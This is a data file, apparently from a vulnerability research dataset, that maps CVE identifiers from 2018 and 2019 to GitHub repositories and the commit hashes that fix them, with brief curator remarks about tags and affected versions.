-CVE-2018-11804;https://github.com/apache/spark;None:None;False;c21d7e1bb958a0cfa4cba34a688d594466088c9e,ac586bbb016d70c60b1bd2ea5320fd56c3a8eead,8906696ac2089f3d6500b0496af7d9995c7de99b,d7a35877b96dce8b742acf77e79bda189e402ae2; commits do not have tags,wrong versions, only 2.x.y are affected according to spark advisory -CVE-2018-12022;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; -CVE-2018-12023;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; -CVE-2018-12043;https://github.com/symphonycms/symphonycms;None:None;False;1ace6b31867cc83267b3550686271c9c65ac3ec0; -CVE-2018-12418;https://github.com/junrar/junrar;None:None;False;ad8d0ba8e155630da8a1215cee3f253e0af45817; -CVE-2018-12537;https://github.com/eclipse-vertx/vert.x;None:None;False;3a6512695a9d610687081eb13d2a1681151fd7fb,1bb6445226c39a95e7d07ce3caaf56828e8aab72; -CVE-2018-12540;https://github.com/vert-x3/vertx-web;None:None;False;f42b193b15a29b772fc576b2d0f2497e7474a7e9,98891b1d9e022b467a3e4674aca4d1889849b1d5; -CVE-2018-12541;https://github.com/eclipse-vertx/vert.x;None:None;False;269a583330695d1418a4f5578f7169350b2e1332; -CVE-2018-12544;https://github.com/vert-x3/vertx-web;None:None;False;ea0b0930fbc122b7114935cafa379facc9611587,3fcb0036dc11f22ea232f61cfff31b29a6b6eca4,26db16c7b32e655b489d1a71605f9a785f788e41,ac8692c618d6180a9bc012a2ac8dbec821b1a973,d814d22ade14bafec47c4447a4ba9bff090f05e8; -CVE-2018-12557;https://github.com/openstack-infra/zuul;None:None;False;ffe7278c08e6e36bf8b18f732c764e00ff51551e; -CVE-2018-12608;https://github.com/moby/moby;None:None;False;ddd5278b07b1c2b12b906244153fd9340e0d7910,190c6e8cf8b893874a33d83f78307f1bed0bfbcd; -CVE-2018-12615;https://github.com/phusion/passenger;None:None;False;4e97fdb86d0a0141ec9a052c6e691fcd07bb45c8; -CVE-2018-12976;https://github.com/golang/gddo;None:None;False;daffe1f90ec57f8ed69464f9094753fc6452e983; -CVE-2018-13447;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13448;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13449;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13450;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13790;https://github.com/concretecms/concretecms;None:None;False;dc742c1ec83b992cd02d70ae19ee190bbed0b3e8; -CVE-2018-13797;https://github.com/scravy/node-macaddress;None:None;False;358fd594adb196a86b94ac9c691f69fe5dad2332; -CVE-2018-13818;https://github.com/twigphp/Twig;None:None;False;eddb97148ad779f27e670e1e3f19fb323aedafeb; -CVE-2018-13863;https://github.com/mongodb/js-bson;None:None;False;511ecc487ea57f554a0d199206a58efbc9cd121c,bd61c45157c53a1698ff23770160cf4783e9ea4a; -CVE-2018-14040;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d,149096016f70fd815540d62c0989fd99cdc809e0; -CVE-2018-14041;https://github.com/twbs/bootstrap;None:None;False;cc61edfa8af7b5ec9d4888c59bf94377e499b78b; -CVE-2018-14042;https://github.com/twbs/bootstrap;None:None;False;2d90d369bbc2bd2647620246c55cec8c4705e3d0; -CVE-2018-14371;https://github.com/eclipse-ee4j/mojarra;None:None;False;475c71e282d695fbbb1946a75e267d1b8d9d7503,1b434748d9239f42eae8aa7d37d7a0930c061e24; -CVE-2018-14574;https://github.com/django/django;None:None;False;a656a681272f8f3734b6eb38e9a88aa0d91806f1,d6eaee092709aad477a9894598496c6deec532ff,c4e5ff7fdb5fce447675e90291fd33fddd052b3c,6fffc3c6d420e44f4029d5643f38d00a39b08525; -CVE-2018-14635;https://github.com/openstack/neutron;None:None;False;13631ff187b6c2c6eec4f356a917288560dc5886,54aa6e81cb17b33ce4d5d469cc11dec2869c762d,8287d7f546e4ffe7a2ac32df50d6b465484f81cc,988eceac27a9ad91775376b3b3fedf84963663a5,c1d2f13495b2eb925be6495840795ead5929fd0e,773c5595b5c79b216d37787fd2ba5a989d48868a; -CVE-2018-14637;https://github.com/keycloak/keycloak;None:None;False;0fe0b875d63cce3d2855d85d25bb8757bce13eb1; -CVE-2018-14642;https://github.com/undertow-io/undertow;None:None;False;dc22648efe16968242df5d793e3418afafcb36c0,c46b7b49c5a561731c84a76ee52244369af1af8a; -CVE-2018-14718;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14719;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14720;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14721;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14731;https://github.com/parcel-bundler/parcel;None:None;False;066e0bf6bd26b15c78bd47df023452e4b20073e4,92b5c0830662f8baebc6fd4eadfd5ddd3de963a3; -CVE-2018-14732;https://github.com/webpack/webpack-dev-server;None:None;False;f18e5adf123221a1015be63e1ca2491ca45b8d10,b3217ca8dc6b371a160b6749b949ab09d7b9f6d7,c42d0da513ac6ee0b48a17b0f6b7830da7c9c2c9; -CVE-2018-14774;https://github.com/symfony/symfony;None:None;False;9cfcaba0bf71f87683510b5f47ebaac5f5d6a5ba,08a32d44b62275b3c6499493dd95e099c84daf60,0f7667d6430eb6529d84a29d7aa83991d1ac4fd0,67044af83d61cfef81349c7add4ade5369acf339,96504fb8c9f91204727d2930eb837473ce154956,1db2d2eda82c8bc031ccd9b85326c0860e5899a2,7f912bbb78377c2ea331b3da28363435fbd91337,974240e178bb01d734bf1df1ad5c3beba6a2f982,bcf5897bb1a99d4acae8bf7b73e81bfdeaac0922,725dee4cd8b4ccd52e335ae4b4522242cea9bd4a; -CVE-2018-14840;https://github.com/intelliants/subrion;None:None;False;b12e287d3814c0f2d0b1892f95fc0190972d2ba5; -CVE-2018-15178;https://github.com/gogs/gogs;None:None;False;1f247cf8139cb483276cd8dd06385a800ce9d4b2; -CVE-2018-15531;https://github.com/javamelody/javamelody;None:None;False;ef111822562d0b9365bd3e671a75b65bd0613353; -CVE-2018-15727;https://github.com/grafana/grafana;None:None;False;df83bf10a225811927644bdf6265fa80bdea9137,7baecf0d0deae0d865e45cf03e082bc0db3f28c3,92ed1f04afcdead02fe3a8bf53caecc89db1c5dc; -CVE-2018-15756;https://github.com/spring-projects/spring-framework;None:None;False;423aa28ed584b4ff6e5bad218c09beef5e91951e,044772641d12b9281185f6cf50f8485b8747132c,c8e320019ffe7298fc4cbeeb194b2bfd6389b6d9; -CVE-2018-15758;https://github.com/spring-projects/spring-security-oauth;None:None;False;ddd65cd9417ae1e4a69e4193a622300db38e2ef1,4082ec7ae3d39198a47b5c803ccb20dacefb0b09,f92223afc71687bd3156298054903f50aa71fbf9; -CVE-2018-16329;https://github.com/ImageMagick/ImageMagick;None:None;False;2c75f301d9ac84f91071393b02d8c88c8341c91c; -CVE-2018-16459;https://github.com/exceljs/exceljs;None:None;False;9066cd89a9fad055166b53ce9e75a42e7636bac1; -CVE-2018-16462;https://github.com/vincentmorneau/apex-publish-static-files;None:None;False;2209af8f2b65c24aa55ab757e0e05b958c16f063; -CVE-2018-16468;https://github.com/flavorjones/loofah;None:None;False;71e4b5434fbcb2ad87643f0c9fecfc3a847943c4,be0fd3ac0fad452730f10e318fa31706257fd081; -CVE-2018-16470;https://github.com/rack/rack;None:None;False;37c1160b2360074d20858792f23a7eb3afeabebd; -CVE-2018-16471;https://github.com/rack/rack;None:None;False;97ca63d87d88b4088fb1995b14103d4fe6a5e594,313dd6a05a5924ed6c82072299c53fed09e39ae7,e5d58031b766e49687157b45edab1b8457d972bd; -CVE-2018-16472;https://github.com/ashaffer/cached-path-relative;None:None;False;a43cffec84ed0e9eceecb43b534b6937a8028fc0; -CVE-2018-16485;https://github.com/nunnly/m-server;None:None;False;01f13f040d1961ca3146dce7e2db990156e65e9a; tag-to-version gets the wrong next tag it should stay empty. The commit has no tag -CVE-2018-16490;https://github.com/aheckmann/mpath;None:None;False;fe732eb05adebe29d1d741bdf3981afbae8ea94d; -CVE-2018-16492;https://github.com/justmoon/node-extend;None:None;False;0e68e71d93507fcc391e398bc84abd0666b28190; -CVE-2018-16733;https://github.com/ethereum/go-ethereum;None:None;False;106d196ec4a6451efedc60ab15957f231fa85639,ecca49e078ace5f867cccdf5c291e3e84dc19982; -CVE-2018-16837;https://github.com/ansible/ansible;None:None;False;a0aa53d1a1d6075a7ae98ace138712ee6cb45ae4,b618339c321c387230d3ea523e80ad47af3de5cf,f50cc0b8cb399bb7b7c1ad23b94c9404f0cc6d23,77928e6c3a2ad878b20312ce5d74d9d7741e0df0; version retrieved from redhat otherwise there were none in the NVD -CVE-2018-16859;https://github.com/ansible/ansible;None:None;False;0d746b4198abf84290a093b83cf02b4203d73d9f,4d748d34f9392aa469da00a85c8e2d5fe6cec52b,2f8d3fcf41107efafc14d51ab6e14531ca8f8c87,8c1f701e6e9df29fe991f98265e2dd76acca4b8c; vulnerable tag is fixed -CVE-2018-16876;https://github.com/ansible/ansible;None:None;False;0954942dfdc563f80fd3e388f550aa165ec931da,424c68f15ad9f532d73e5afed33ff477f54281a7,e0a81d133ffc8f7067182c53cf6a28c724dd1099,ba4c2ebeac9ee801bfedff05f504c71da0dd2bc2; -CVE-2018-16886;https://github.com/etcd-io/etcd;None:None;False;c7f744d6d373e91cc300cd73de9d00b6166f36f1,a2b420c3642a3e4dfefccf3a2ef5b57906206ed9,bf9d0d8291dc71ecbfb2690612954e1a298154b2; -CVE-2018-16984;https://github.com/django/django;None:None;False;bf39978a53f117ca02e9a0c78b76664a41a54745,c4bd5b597e0aa2432e4c867b86650f18af117851; -CVE-2018-17057;https://github.com/tecnickcom/TCPDF;None:None;False;ac6e92fccc7d9383dfd787056831349621b1aca2,1861e33fe05f653b67d070f7c106463e7a5c26ed; -CVE-2018-17104;https://github.com/microweber/microweber;None:None;False;982ea9d5efb7d2306a05644ebc3469dadb33767e; -CVE-2018-17175;https://github.com/marshmallow-code/marshmallow;None:None;False;d5d9cb22dda6f39117f6f9497a6a66813cb8c64f,98f2b4759c9a7c7ac5e790727d47f2b328520713; -CVE-2018-17184;https://github.com/apache/syncope;None:None;False;73aed0a741b1255f45893e3cada6501473350738,36fb466afd64894170fa5e2e030ce6895120b1af,b25a8834db2cc7ea45707a1218e85e0475684270; -CVE-2018-17187;https://github.com/apache/qpid-proton-j;None:None;False;0cb8ca03cec42120dcfc434561592d89a89a805e; -CVE-2018-17193;https://github.com/apache/nifi;None:None;False;e62aa0252dfcf34dff0c3a9c51265b1d0f9dfc9f; -CVE-2018-17194;https://github.com/apache/nifi;None:None;False;748cf745628dab20b7e71f12b5dcfe6ed0bbf134; -CVE-2018-17195;https://github.com/apache/nifi;None:None;False;246c090526143943557b15868db6e8fe3fb30cf6; -CVE-2018-17197;https://github.com/apache/tika;None:None;False;0c49c851979163334ea05cbebdd11ff87feba62d; -CVE-2018-17246;https://github.com/elastic/kibana;None:None;False;9b78cfd4b971df4852c77306e062ef0ccbf2186c,51aff7d3c49724fcbaba4353dff0cd7c3be799b0,22ba11eb525a2045d43307177081047f8a7a3dab,bc6a68529fc72b704b11871bfb11a51bdc724cbf; -CVE-2018-17419;https://github.com/miekg/dns;None:None;False;501e858f679edecd4a38a86317ce50271014a80d; my bad, wrong pick and they were inverted -CVE-2018-18074;https://github.com/psf/requests;None:None;False;3331e2aecdbf575dd60abef4df79c52d78610a83,c45d7c49ea75133e52ab22a8e9e13173938e36ff; -CVE-2018-18206;https://github.com/Bytom/bytom;None:None;False;a79fbcb71c138a499166c802d9f6af5c2ea18253,1ac3c8ac4f2b1e1df9675228290bda6b9586ba42; -CVE-2018-18389;https://github.com/neo4j/neo4j;None:None;False;46de5d01ae2741ffe04c36270fc62c6d490f65c9; -CVE-2018-18476;https://github.com/nedap/mysql-binuuid-rails;None:None;False;9ae920951b46ff0163b16c55d744e89acb1036d4; -CVE-2018-18854;https://github.com/spray/spray-json;None:None;False;855b35e6d65079085d580ab3063637d94c8f3e0a,c8e106fe41dad3916d54dcbf90e3aa5599d4d461; -CVE-2018-18893;https://github.com/HubSpot/jinjava;None:None;False;4f28830ef9883e2c4e2a92a0d37b93c8620de2f7,c13927db0fb7bb3b567469f125be8000f8cbf601; -CVE-2018-18926;https://github.com/go-gitea/gitea;None:None;False;aeb5655c25053bdcd7eee94ea37df88468374162,582213a858d936b4a55ad2416fd0615e78edc247,84829fba82741b5a0a882a9f1e95ea3651fc3ae7; vulnerable tag is fixed -CVE-2018-19048;https://github.com/mycolorway/simditor;None:None;False;ef01a643cbb7f8163535d6bfb71135f80ec6a6fd; -CVE-2018-19133;https://github.com/flarum/core;None:None;False;0536b208e1c31d5c9911d231413f2d1a66683f70,e99f7fcdace74211bec5627e6adf20ddf7dad2a7; -CVE-2018-19184;https://github.com/ethereum/go-ethereum;None:None;False;83e2761c3a13524bd5d6597ac08994488cf872ef; vulnerable tag is fixed -CVE-2018-19351;https://github.com/jupyter/notebook;None:None;False;4026ef01077d2e313a22b371fae2705196b8161d,107a89fce5f413fb5728c1c5d2c7788e1fb17491; -CVE-2018-19352;https://github.com/jupyter/notebook;None:None;False;288b73e1edbf527740e273fcc69b889460871648,ad25be985c55f66ef2105f712cb915708d568e29; -CVE-2018-19360;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; -CVE-2018-19361;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; -CVE-2018-19362;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; -CVE-2018-19370;https://github.com/Yoast/wordpress-seo;None:None;False;3bfa70a143f5ea3ee1934f3a1703bb5caf139ffa,3bc687351bc9a8c9c8c6bb8dbf048184075240a3; -CVE-2018-19620;https://github.com/star7th/showdoc;None:None;False;bcdb5e3519285bdf81e618b3c9b90d22bc49e13c,7e9f06c2f0cbbae55b0cfa0797fe2b4aae562443; -CVE-2018-19787;https://github.com/lxml/lxml;None:None;False;6be1d081b49c97cfd7b3fbd934a193b668629109; -CVE-2018-19992;https://github.com/Dolibarr/dolibarr;None:None;False;0f06e39d23636bd1e4039ac61a743c79725c798b; -CVE-2018-19993;https://github.com/Dolibarr/dolibarr;None:None;False;fc3fcc5455d9a610b85723e89e8be43a41ad1378; -CVE-2018-19994;https://github.com/Dolibarr/dolibarr;None:None;False;850b939ffd2c7a4443649331b923d5e0da2d6446; -CVE-2018-20000;https://github.com/Bedework/bw-webdav;None:None;False;ccb87c2757bab531c53faf0637ee342a378caa7f,cd51e67093ef7f01003878a44f31bc0b2a0d73d1,67283fb8b9609acdb1a8d2e7fefe195b4a261062; -CVE-2018-20028;https://github.com/contao/contao;None:None;False;bbe5fe1d385cd1195670e2d6b972272133443c59; -CVE-2018-20059;https://github.com/pippo-java/pippo;None:None;False;9f36e5891c0b11f840e1e1561ae96d83ba9ce759; -CVE-2018-20094;https://github.com/xuxueli/xxl-conf;None:None;False;e9ea78ccacd06539f75c083c47b3419cf985a8c0,7fa384e507b7eaa5821003211107e243e0d2b49c; -CVE-2018-20227;https://github.com/eclipse/rdf4j;None:None;False;099482e52f070a3d74e5ad368cff59c91e9b4f8a,df15a4d7a8f2789c043b27c9eafe1b30316cfa79; -CVE-2018-20433;https://github.com/swaldman/c3p0;None:None;False;7dfdda63f42759a5ec9b63d725b7412f74adb3e1; -CVE-2018-20594;https://github.com/hs-web/hsweb-framework;None:None;False;b72a2275ed21240296c6539bae1049c56abb542f; -CVE-2018-20595;https://github.com/hs-web/hsweb-framework;None:None;False;40929e9b0d336a26281a5ed2e0e721d54dd8d2f2; -CVE-2018-20677;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d; their commit is not correct (second one) -CVE-2018-20713;https://github.com/shopware/shopware;None:None;False;73cb46727050e28a0d7c2cf8471baaa3eaf2e5e8; -CVE-2018-20745;https://github.com/yiisoft/yii2;None:None;False;3317d26df0497c2f1a7f8fb9d1c668d911ab284f,2b6d1818783b103993873661c7736431b0a07604; -CVE-2018-20756;https://github.com/modxcms/revolution;None:None;False;4219e90f84e21f9cf4acc07ac926b5cde12731a4,b014e57624479b637586630a0376acc1e2be47c0,20049805dad576250185e4317c4ded1d21871219; -CVE-2018-20801;https://github.com/highcharts/highcharts;None:None;False;7c547e1e0f5e4379f94396efd559a566668c0dfa; -CVE-2018-20834;https://github.com/npm/node-tar;None:None;False;b0c58433c22f5e7fe8b1c76373f27e3f81dcd4c8,7ecef07da6a9e72cc0c4d0c9c6a8e85b6b52395d; -CVE-2018-20835;https://github.com/mafintosh/tar-fs;None:None;False;06672828e6fa29ac8551b1b6f36c852a9a3c58a2; -CVE-2018-20962;https://github.com/Laravel-Backpack/CRUD;None:None;False;8b6bd0a2d489a4690f6b1d7ace67e2f07f5f0cc6; -CVE-2018-20975;https://github.com/fatfreecrm/fat_free_crm;None:None;False;f2514212ae80781a9bbf7b6f4820f57d652a405f,4a57efa76ceb55c8fd8f1595f8d5c6946faa2307,346c5e0704926954e2e42f5a3c64628257a6315b,fe39b442722d9926229e325cf7a43b817bfa5a02,2f5c7fa22b085d2fe6e8aec066eb2f74c1403c1f,6d60bc8ed010c4eda05d6645c64849f415f68d65; -CVE-2018-1000013;https://github.com/jenkinsci/release-plugin;None:None;False;fe1660a5ebff2377b6a64214c6012e8615b3f81f; -CVE-2018-1000014;https://github.com/jenkinsci/translation-plugin;None:None;False;1287c8ead6adc891210b8b9fbc33f07adebf720d; -CVE-2018-1000060;https://github.com/sensu/sensu;None:None;False;46ff10023e8cbf1b6978838f47c51b20b98fe30b,44dc4263021782728c0d12b24f57c4cefd8e9360; -CVE-2018-1000088;https://github.com/doorkeeper-gem/doorkeeper;None:None;False;7b1a8373ecd69768c896000c7971dbf48948c1b5,90fe419eb72f20fb8d9a3b4ec9ff00e8f6d897c6,84fd4d03bced7d04ab2c68cecf26e838ae96faf4,39916a613b7dcc738aa38f7a17e1de9757bd0754; -CVE-2018-1000089;https://github.com/anymail/django-anymail;None:None;False;1a6086f2b58478d71f89bf27eb034ed81aefe5ef; -CVE-2018-1000096;https://github.com/brianleroux/tiny-json-http;None:None;False;1460a815c9a657daaf29ebdf085b935221fcf676,3c1e36d8bef3ef5fd8e4447f816d5ffe2bfc3190; vulnerable tag is fixed -CVE-2018-1000118;https://github.com/electron/electron;None:None;False;ce361a12e355f9e1e99c989f1ea056c9e502dbe7,92f4e5ea7d99c5a1b425c77c9c73ae360ea9f69c,0b7fd96629805e95014ac13c29f732dbd6837713; -CVE-2018-1000119;https://github.com/sinatra/sinatra;None:None;False;8aa6c42ef724f93ae309fb7c5668e19ad547eceb; -CVE-2018-1000129;https://github.com/rhuss/jolokia;None:None;False;5895d5c137c335e6b473e9dcb9baf748851bbc5f; -CVE-2018-1000134;https://github.com/pingidentity/ldapsdk;None:None;False;8471904a02438c03965d21367890276bc25fa5a6; the release commit contains the CVE ID just as reference, this is bs. Commit ID is in the advisory description -CVE-2018-1000159;https://github.com/tlsfuzzer/tlslite-ng;None:None;False;e5e9145558f4c1a81071c61c947aa55a52542585,3674815d1b0f7484454995e2737a352e0a6a93d8,cf1e82729f3bd44b9dd5d88a6f3a64c73b131889,ec5c61fae8b8eee0f62717091775f68d8161ca34; -CVE-2018-1000164;https://github.com/benoitc/gunicorn;None:None;False;1e10a02e73c87dfadc394b361af33864d0e59e24; -CVE-2018-1000518;https://github.com/aaugustin/websockets;None:None;False;b6a25ceb3555d0ba69e5961b8d7616e4c1aecb2b; -CVE-2018-1000525;https://github.com/flack/openpsa;None:None;False;097eae045cde6e59b063261cf7cdaa896d14ab39; -CVE-2018-1000531;https://github.com/FusionAuth/fusionauth-jwt;None:None;False;abb0d479389a2509f939452a6767dc424bb5e6ba; -CVE-2018-1000538;https://github.com/minio/minio;None:None;False;9c8b7306f55f2c8c0a5c7cea9a8db9d34be8faa7; -CVE-2018-1000539;https://github.com/nov/json-jwt;None:None;False;3393f394f271c87bd42ec23c300727b4437d1638,a3b2147f0f6d9aca653e7a30e453d3a92b33413f; -CVE-2018-1000559;https://github.com/qutebrowser/qutebrowser;None:None;False;5a7869f2feaa346853d2a85413d6527c87ef0d9f,4c9360237f186681b1e3f2a0f30c45161cf405c7; -CVE-2018-1000613;https://github.com/bcgit/bc-java;None:None;False;4092ede58da51af9a21e4825fbad0d9a3ef5a223,cd98322b171b15b3f88c5ec871175147893c31e6; -CVE-2018-1000620;https://github.com/hapijs/cryptiles;None:None;False;9332d4263a32b84e76bf538d7470d01ea63fa047; -CVE-2018-1000632;https://github.com/dom4j/dom4j;None:None;False;e598eb43d418744c4dbf62f647dd2381c9ce9387; -CVE-2018-1000644;https://github.com/eclipse/rdf4j;None:None;False;c412f4274a9b0a95fd4f2c26ce42b9800caf4f0a,50f2f51950227a4ec595a2922d81da487aba5135; fixed tag is vulnerable -CVE-2018-1000665;https://github.com/dojo/dojo;None:None;False;9e4b7252dc4fcfe6bed1e4e1081a05d2d0a5c53a,2e27f9ad62405dce64369cb0f7aeb5c64e873693,c15b3e7c215389a1474b2fa6565b112e3b9ffc0f,48cb00f29d8b87a5c006d237a39dcd5ec6c68fc5,595ea4e7a8da5960f29ecbe1320e755ea688797c,33eb767c477c6953446d9af8f5229d44d3dd8500,9117ffd5a3863e44c92fcd58564c0da22be858f4; -CVE-2018-1000803;https://github.com/go-gitea/gitea;None:None;False;194a11eb110cd98fc2ba52861abf7770db6885a3,99ce0bfcd7126ec0d82166c63865bde4d9d75d84; -CVE-2018-1000805;https://github.com/paramiko/paramiko;None:None;False;56c96a659658acdbb873aef8809a7b508434dcce; -CVE-2018-1000807;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; -CVE-2018-1000808;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; -CVE-2018-1000809;https://github.com/privacyidea/privacyidea;None:None;False;189312a99b499fe405fd3df5dd03a6b19ba66d46,a3edc09beffa2104f357fe24971ea3211ce40751; tracer wrong -CVE-2018-1000814;https://github.com/aio-libs/aiohttp-session;None:None;False;1b356f01bbab57d041c9a75bacd72fbbf8524728; -CVE-2018-1000820;https://github.com/neo4j-contrib/neo4j-apoc-procedures;None:None;False;e04325c48663994af0bab69a551ad64be2219708,45bc09c8bd7f17283e2a7e85ce3f02cb4be4fd1a; -CVE-2018-1000822;https://github.com/codelibs/fess;None:None;False;f68636939d479be650aaa90762c2a06b57ccc83f,4e0d9f5faaf4ec75dbe89f5ff97ece0f03b097a8,faa265b8d8f1c71e1bf3229fba5f8cc58a5611b7; -CVE-2018-1000843;https://github.com/spotify/luigi;None:None;False;1a5b64106e9182aca70b52b0c55d70c64d76f413; vulnerable tag is fixed -CVE-2018-1000850;https://github.com/square/retrofit;None:None;False;b9a7f6ad72073ddd40254c0058710e87a073047d; -CVE-2018-1000854;https://github.com/esigate/esigate;None:None;False;30cad23a8f282600c9b045e1af09f6f8a65357b1,8461193d2f358bcf1c3fabf82891a66786bfb540,b866acb1ebc661dbe475330e27e0d69693de1971; -CVE-2018-1000855;https://github.com/basecamp/easymon;None:None;False;a5deaf7359fc177fcf3fca725618b53619a30b7e,16b787030584857046ce2e81e60c811d55a015a6; -CVE-2018-1000872;https://github.com/OpenKMIP/PyKMIP;None:None;False;3a7b880bdf70d295ed8af3a5880bab65fa6b3932,06c960236bcaf6717fc5cf66cf8b5179804c5a05; -CVE-2018-1000888;https://github.com/pear/Archive_Tar;None:None;False;59ace120ac5ceb5f0d36e40e48e1884de1badf76; -CVE-2018-1002101;https://github.com/kubernetes/kubernetes;None:None;False;b2fb73ffead03d3d13f054b45867981bf2916976,46981ede3a65ac8a80abaeb6ccb480537bcb3d2d,914e404d3fc40d6c1d1d02abf2fd3ea0667f3fca,d65039c56ce4de5f2efdc38aa1284eeb95f89169,27bc865cc1bffb97d4dff38492aa9f830f859e45; -CVE-2018-1002102;https://github.com/kubernetes/kubernetes;None:None;False;50cf168e83f942f4850191c268461d07fcac19c7,d9aeea6ba4a52a4924050636c2205d007d4a507d,109b67c291de3b9bda35c35e471b9064de6ff859,4ee9f007cbc88cca5fa3e8576ff951a52a248e3c,e385ba8c4a0860746e661b39611c88aff5bee5f2,687c04c53006441ed40f4fa7c09a726cfcec380e; vulnerable tag is fixed -CVE-2018-1002105;https://github.com/kubernetes/kubernetes;None:None;False;4faa71170f4ba2d36e346ccc319b8405d807c657,753b2dbc622f5cc417845f0ff8a77f539a4213ea,0535bcef95a33855f0a722c8cd822c663fc6275e,637c7e288581ee40ab4ca210618a89a555b6e7e9,774585f773c7c591645f876e0a26155b7838debe,435f92c719f279a3a67808c80521ea17d5715c66,b84e3dd6f80af4016acfd891ef6cc50ce05d4b5b,2257c1ecbe3c0cf71dd50b82752ae189c94ec905; -CVE-2018-1002150;https://github.com/koji-project/koji;None:None;False;642bcb3bd9139aaedafe5b3600dd71a326c0026f,ab1ade75c155c2325ec92913fc5c510fd61757a1,84c0bde0cac42c3199d636ad934f852276f10975,4ea5849ff0cb9a1cc799de50b8573b0561dcfcef,5fbd954bfa883051d8cf7a294f965cb4f87dab83,8024d38f8766f95e7fd783b866966aaeffe5140e; Advisory does not mention 1.16, we find the correct backports -CVE-2018-1002200;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;f8f4233508193b70df33759ae9dc6154d69c2ea8,a1b58c0cccc4e9a2e4b06284254492b6ecf6033a,58bc24e465c0842981692adbf6d75680298989de; -CVE-2018-1002201;https://github.com/zeroturnaround/zt-zip;None:None;False;759b72f33bc8f4d69f84f09fcb7f010ad45d6fff; -CVE-2018-1002203;https://github.com/ZJONSSON/node-unzipper;None:None;False;2220ddd5b58f6252069a4f99f9475441ad0b50cd,5f68901c2e2e062a5e0083a81d257eccea0eb760; -CVE-2018-1002204;https://github.com/cthackers/adm-zip;None:None;False;6f4dfeb9a2166e93207443879988f97d88a37cde,62f64004fefb894c523a7143e8a88ebe6c84df25; -CVE-2018-1002205;https://github.com/haf/DotNetZip.Semverd;None:None;False;55d2c13c0cc64654e18fcdd0038fdb3d7458e366,8e79ed7dc17fe6d3c74c7ac1344b2aa60eb30039; -CVE-2018-1002207;https://github.com/mholt/archiver;None:None;False;e4ef56d48eb029648b0e895bb0b6a393ef0829c3; -CVE-2018-1002208;https://github.com/icsharpcode/SharpZipLib;None:None;False;5376c2daf1c0e0665398dee765af2047e43146ca; commit in reference is retrieved from a release and is a random wrong one -CVE-2018-1999024;https://github.com/mathjax/MathJax;None:None;False;a55da396c18cafb767a26aa9ad96f6f4199852f1; -CVE-2019-0194;https://github.com/apache/camel;None:None;False;53185f0b221b899aacb3c379647a866a8f408a87,68f2de31b7752bd49b7898d7098b3bfe8e0d0bdb,05ff65d5cebf1fa5172c59dd16359ed583c099ca,f337a98e86ef18611b14570e6780053fe3ddcc02,15a1f10fb532bdcba184cda17be602a2358bd5e8,5b64969d37cf2906efd4623cfd473041ce5132fd; -CVE-2019-0201;https://github.com/emperwang/zookeeper;None:None;False;5ff19e3672987bdde2843a3f031e2bf0010e35f1,af741cb319d4760cfab1cd3b560635adacd8deca; this repo has no tag -CVE-2019-0207;https://github.com/apache/tapestry-5;None:None;False;6dd7219fd4707467a36091e2f7f5f6460c619099; -CVE-2019-0210;https://github.com/apache/thrift;None:None;False;264a3f318ed3e9e51573f67f963c8509786bcec2,92c660f541fff657682f8239b6a995f3b71e6214; -CVE-2019-0219;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;686108484e6a7c1a316d7c6bc869c209c46d27e3; -CVE-2019-0226;https://github.com/apache/karaf;None:None;False;fe3bc4108e5a8b3c804e5da91ec0d5695588eb25,4155eac7dffa933f12c1e0cf18e9492ccc931093,bf5ed62d310f9042f9305dafac9a851464bb27cf; -CVE-2019-0228;https://github.com/apache/pdfbox;None:None;False;e5232887e684aeffc37ebb25ee8953e43d95c77c,be36ef01842885b556a4e7b40b5e2e8e7b1d2816; -CVE-2019-0911;https://github.com/chakra-core/ChakraCore;None:None;False;a2deba5e1850782014a2a34678464b251e448337; -CVE-2019-0912;https://github.com/chakra-core/ChakraCore;None:None;False;936a5af1c07e0fdec9aab85c05339dabe4aaeeb1; -CVE-2019-0917;https://github.com/chakra-core/ChakraCore;None:None;False;b5f8fad1b00087bd0a24cc173c2dfedc4f8aee33; -CVE-2019-0922;https://github.com/chakra-core/ChakraCore;None:None;False;a9ab1aae31078e80593b9227db11d316c2239ef3; -CVE-2019-0924;https://github.com/chakra-core/ChakraCore;None:None;False;6615113a09c0618ecc10e5680ffb978bf665641f; -CVE-2019-0925;https://github.com/chakra-core/ChakraCore;None:None;False;32ca10f3955f2a3ca56c6671c721b1264eca06b8; -CVE-2019-0933;https://github.com/chakra-core/ChakraCore;None:None;False;1a550c67b33b27675c0553152cabd09e4ffe3abf; 